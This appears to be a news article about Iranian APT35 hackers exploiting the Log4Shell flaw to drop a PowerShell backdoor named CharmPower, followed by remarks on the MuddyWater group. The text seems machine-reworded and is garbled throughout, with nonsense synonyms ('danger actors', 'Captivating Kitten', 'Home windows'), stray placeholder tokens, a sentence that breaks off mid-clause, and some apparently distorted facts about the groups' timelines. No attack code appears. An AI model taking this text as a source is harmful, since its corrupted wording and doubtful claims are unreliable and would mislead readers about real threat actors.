Iranian hackers deploy PowerShell backdoor by using Log4j flaw

State-sponsored danger actors try to abuse the Log4Shel flaw

(*8*) (*2*)
Log4Shell flaw exploited via any other hacker team

The vulnerability within the publicly-exposed java programs were given exploited to unlock the hitherto undocumented PowerShell-based backdoor. The modular trojan named CharmPower can apply up the exploitation with different actions and malicious processes.[1] Hackers referred to as the Captivating Kitten team leveraged the Log4Shell assaults to drop the malware payload that may take care of c2 communications, carry out enumeration of the gadget and obtain, decrypt, load different payloads.(*4*)[2]

It sounds as if that the setup of this marketing campaign used to be relatively rushed for the reason that elementary open-source instrument were given used for the exploitation. The truth that the marketing campaign used to be in response to earlier operations made the assault more straightforward to come across and characteristic for the researchers.(*3*)[3] The APT35 hacker team is widely recognized and will also be recognized as infrastructure the usage of explicit toolsets in maximum in their assaults.

The specific Log4Shell vulnerability that those danger actors exploited have brought about main problems everywhere the sector. The CVE flaw with the severity fee of 10.0 nonetheless haunts organizations and customers in 2022.[4] The problem lets in exploitation to result in explicit code execution on affected methods.

PowerShell modular backdoor CharmPower

The APT35 team used variously uncovered operations recognized to be attributed to the gang, however the modular backdoor printed some new options. The specific malware is in a position to carry out more than a few duties at the exploited device. The trojan can validate the community connection after the execution and make HTTP POST requests to

The script collects Home windows model main points, pc identify, contents of recordsdata. The malware is able to elementary gadget enumeration and will retrieve the C&C area. Malware decodes the retrieved area and will obtain, decrypt, execute different modules at the already affected device.

Those further modules that may be despatched from the C2 server can:

  • uninstall programs, acquire knowledge about put in apps;
  • seize screenshots;
  • acquire details about operating processes;
  • execute instructions remotely;
  • transparent lines of the malware like startup recordsdata, processes.

Iranian state-backed hackers now not preventing

Test Level printed a listing of similarities between this and different assaults involving the similar hacker team. Explicit options have been indicated between the Android spy ware and CharmPower. The logging purposes and different implementations in code overlap with different campaigns of APT35, aka CharmingKitten. For this reason why researchers can resolve the danger actor accountable for the assaults.


APT actors be sure to trade their equipment and infrastructure to keep away from being detected and make attribution tougher. APT35, alternatively, does now not agree to this conduct.

Not too long ago Iranian hackers made headlines as a result of US Cyber Command related the MuddyWater to the Iranian intelligence team.(*5*)[5] The gang is a danger actor crew that performed assaults concentrated on Heart Japanese countries, Ecu, North American countries. There at all times were suspicions that the gang is state-backed.

The gang is understood for assaults directed in opposition to more than a few entities in academia, governments, cryptocurrency, telecommunications, oil sectors. It’s believed that hackers began their assaults in 2022. Danger actors additionally exploit vulnerabilities and leverage faraway desktop control equipment to unfold backdoors, customized malware that results in unauthorized get right of entry to to specifically delicate and treasured knowledge.

Hackers get started with the assaults, after which knowledge can get stolen from exploited methods. Exploiting vulnerabilities additionally assist to exfiltrate knowledge for additional extortion and deploy ransomware that itself is a danger of cryptocurrency extortion.

(Visited 1 times, 1 visits today)